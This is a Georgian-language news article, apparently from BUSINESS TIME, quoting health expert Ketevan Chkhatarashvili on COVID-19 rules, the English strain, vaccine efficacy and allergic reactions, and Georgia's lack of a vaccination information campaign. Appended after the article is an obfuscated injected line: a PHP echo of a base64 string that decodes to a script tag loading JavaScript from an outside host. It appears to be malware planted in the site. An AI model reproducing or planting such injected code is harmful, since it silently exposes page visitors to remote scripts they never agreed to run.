celsiusi
ავერსი საქკაბელი
როგორც ექიმი, ჯანდაცვის ექსპერტი ქეთევან ჩხატარაშვილი მიიჩნევს, იმისათვის , რომ ქვეყანამ მესამე ტალღა ლოქდაუნის გარეშე გაიაროს არსებული რეგულაციები მაქსიმალურად უნდა შესრულდეს. ამის შესახებ ქეთევან ჩხატარიშვილმა საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა.
 
“ფაქტია, რომ ხალხი ძალიან დაიღალა და ფაქტია, რომ მოიკლო წესების დაცვის ტენდენციამ. ფაქტია ისიც, რომ თავშეყრები ეწყობა, ადამიანები მონაწილეობენ და ფაქტია ისიც, რომ გაიზარდა დაავადების მაჩვენებელის რაოდენობის ზრდა.
 
ჩვენ უკვე ვსაუბრობთ ინგლისური შტამის ცირკულაციაზე ქვეყანაში, რომელსაც გავრცელების გაცილებით მაღალი სისწრაფე ახასიათებს. როდესაც მატულობს ვირუსის გავრცელება მატულობს ლეტალობაც.”- განუცხადა ჩხატარაშვილმა BUSINESS TIME-ს. 
 
მისივე თქმით, კომუნიკაციის არარსებობის ფონზე რთული იქნება ვაქცინაციის აქტივობის ამაღლება. ვინაიდან საინფორმაციო კამპანია ვაქცინასთან მიმართებაში ქვეყანაში არ არსებობს .
 
“ მოსახლეობას არ უხსნიან, რატომ არის მნიშვნელოვანი ვაქცინა. არ არის საუბარი ცალკეული ვაქცინის დადებითი და უარყოფითი მხარეების და ეფექტურობის შესახებ. ამ ყველაფრის ფონზე იმის გაგონება, ჩინეთმა აღიარა , რომ მისი ვაქცინა მხოლოდ 50.4 % ის შემთხვევაშია ეფექტური, რა თქმა უნდა უარყოფით გავლენას იქონიებს ადამიანების გადაწყვეტილებაზე . მითუმეთეს, რომ ჩინურ ვაქცინასთან მიმართებაში ისედაც არსებობდა სკეპტიციზმი მოსახლეობაში. თუმცა , სად არის ვაქცინა დამზადებული ამას მნიშვნელობა არ აქვს , მთავარია მისი ეფექტურობა და უსაფრთხოება.”- განაცხადა ჩხატარაშვილმა. 
 
მისივე განმარტებით, მარტო ვაქცინის ეფექტურობა არ არის საკმარისი, მოსახლეობას არ აქვს ინფორმაცია იმის შესახებ, რომ მაგალითად, ალერგიული რეაქციები ფაიზერს უფრო მეტი აქვს ვიდრე ასტრაზენეკას . მსოფლიოში,  ალერგიული რეაქციები ანაფილაქსიური შოკის სახით, ფაიზერის შემთხვევაში უფრო მეტია დაფიქსირებული ვიდრე ასტრაზენეკასი, ამიტომ, მარტო იმ ინფორმაციის მიწოდება ადამიანებისათვის , თუ რამდენად ეფექტურია ესა თუ ის ვაქცინა საკმარისი არ არის . 
 
“ამით , მე არანაირად არ ვამბობ   იმას, რომ ფაიზერის ვაქცინა არ ვარგა , ან რომელიმე ვაქცინა თუნდაც ასტრაზენეკა . ის ვაქცინები რაც არის ბაზარზე და ავტორიზებულია ჯანმოს მიერ შესაბამისი ეფექტურობა გააჩნია . რაც შეეხება ჩინური ვაქცინის ეფექტურობას 50 პროცენტი არის მინიმალური ზღვარი  ეფექტურობის. ხოლო, როდესაც სარგებელზე ვსაუვრობთ ვაქცინის , უნდა ავღნიშნოთ, რომ არსებობს ქვეყნები სადაც სიკვდილიანობის მაჩვენებელი არის ნული. ასეთია , მაგალითად, იგივე დიდი ბრიტანეთი , იქ სადაც ვაქცინაციის პროცესი სისტემატიურად მიმდინარეობს . აშშ- სადაც , როგორც კი დაჩქარდა ვაქცინაციის პროცესი 45 % -ია თუ არ ვცდები მოსახლეობის დღეს უკვე ვაქცინირებული , მილიონამდე ახალი სამუშაო ადგილის შექმნაზე ალაპარაკდა პრეზიდენტის ადმინისტრაცია. ესეთი საპირწონე ინფორმაცია ვაქცინაციაზე , ის თუ რა სარგებელიმოაქვს ძალიან ბევრია და მოსახლეობამდე მიტანა არის აუცილებელი. მე აღარ ვსაუბრობ იმაზე, რომ დღემდე არსებულ ვაქცინებს მილიონობით ადამიანის სიცოცხლე აქვს გადარჩენილი. მაგალითად , ყვავილი როგორც ესეთი დღეს აღარ არსებობს და ეს პირველრიგში ვაქცინის დამსახურებაა.”- განმარტა ქეთევან ჩხატარაშვილმა.
 
ჩხატარაშვილის თქმით,  ამიტომ არის ინფორმაცია აუცილებელი. ადამიანებს აღარ სჯერათ და მათთვის სწორი ინფორმაციის მიწოდების თვალსაზრისით არაფერი კეთდება ქვეყანაში.
 
“მარტო დაშინება იმით, რომ ეს მოხდება და ის მოხდება აღარ მუშაობს. ეს მუშაობდა დასაწყისში. ვერ ხედავენ რა ხდება? ყოველდღიურად მინიმუმ 8 ადამიანის გარდაცვალებას გვახსენებს სტატისტიკა. საქართველოსნაირი ქვეყნისთვის ეს არის კატასტროფა და დემოგრაფიული კრიზისი. საერთოდ არაფერი არ კეთდება, არაფერს არ აკეთებენ ინფორმაციული თვალსაზრისით. სახელმწიფოს არააქვს საინფორმაციო კამპანია.”- აღნიშნა ჩხატარიშვილმა. 
 
 
 
 
 
1199
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");